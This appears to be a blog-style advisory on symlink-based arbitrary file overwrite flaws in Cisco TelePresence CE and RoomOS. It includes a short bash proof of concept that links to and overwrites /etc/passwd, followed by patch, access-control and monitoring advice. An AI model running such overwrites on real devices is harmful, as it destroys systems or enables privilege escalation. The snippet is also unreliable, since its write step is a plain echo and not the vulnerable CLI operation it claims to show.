In 2023, Cisco announced a set of vulnerabilities found in the command-line interface (CLI) of Cisco TelePresence CE and RoomOS systems. One of the most striking vulnerabilities is tracked as CVE-2023-20093, but together with CVE-2023-20092 and CVE-2023-20094, these three flaws can give an attacker with local, authenticated access the ability to overwrite any file on the device’s file system. This write-up will break down how the vulnerabilities work, provide some hands-on code snippets to show exploitation, and explain what you can do to protect your environment.
RoomOS
> *Note: CVE-2023-20092 does not affect Cisco DX70, DX80, TelePresence MX Series, or TelePresence SX Series. But CVE-2023-20093 impacts most systems running TelePresence CE and RoomOS versions.*
Attack Requirements
1. The attacker must have a remote support user account on the device (not just guest or network access).
The Core Issue
All three CVEs stem from improper access controls on the local file system. Specifically, the device does not sufficiently check permissions or ownership on files created or modified via the CLI. This allows an attacker to exploit symbolic links (“symlinks”) to redirect scripts or file accesses to arbitrary locations.
Breakdown
Imagine you’re an attacker with a remote support user account. These steps can let you overwrite critical files (configurations, logs, even binaries) on the device:
1. Create a Symlink in a special directory on the device, pointing to the target file you want to overwrite.
Trigger the CLI Functionality (such as uploading settings) that writes to that directory.
3. The CLI script, instead of writing to its intended file, follows your symlink and overwrites your designated target file.
Below is a generalized proof-of-concept in bash shell
# Step 1: SSH into the device with support account credentials
ssh support@ciscotelepresence
# Step 2: Navigate to a writable directory used by the CLI
cd /tmp
# Step 3: Create a symbolic link pointing to, say, /etc/passwd
ln -s /etc/passwd myconfigfile
# Step 4: Use a vulnerable CLI operation to write/update 'myconfigfile'
echo "overwrite text" > myconfigfile
# Step 5: /etc/passwd is now overwritten! (can brick the device or escalate privileges)
Here, we’re replacing /etc/passwd with arbitrary text, a classic demonstration that can make the system unusable or open it to further attack.
References and Resources
- Cisco Official Advisory - CSCwd67983
- National Vulnerability Database - CVE-2023-20093
- Cisco Security Advisory for RoomOS Overwrite Flaws
*There are no workarounds for these vulnerabilities.*
A fix requires installing the latest patched version of Cisco TelePresence CE or RoomOS.
Update Immediately
Cisco has released updates that fix these weaknesses. You can check your device’s software version and download patches from the Cisco Software Download Center.
Restrict Remote Access
While updating, make sure remote support accounts are tightly controlled and only granted to trusted personnel.
Monitor for Signs of Exploitation
Look for unexpected file changes in logs and investigate any suspicious CLI activity.
Conclusion
CVE-2023-20093 (along with its siblings CVE-2023-20092 and CVE-2023-20094) exposes a fundamental flaw in the way Cisco’s TelePresence and RoomOS handle file access from the CLI. By exploiting symbolic links and poor access controls, a local attacker can potentially take full control or disrupt the device entirely. This makes patching urgent for all users.
If your organization runs affected devices, patch now and audit your accounts. Sometimes the simplest bug, like a symlink, can have the longest reach.
Timeline
Published on: 11/15/2024 16:15:26 UTC
Last modified on: 11/18/2024 17:11:56 UTC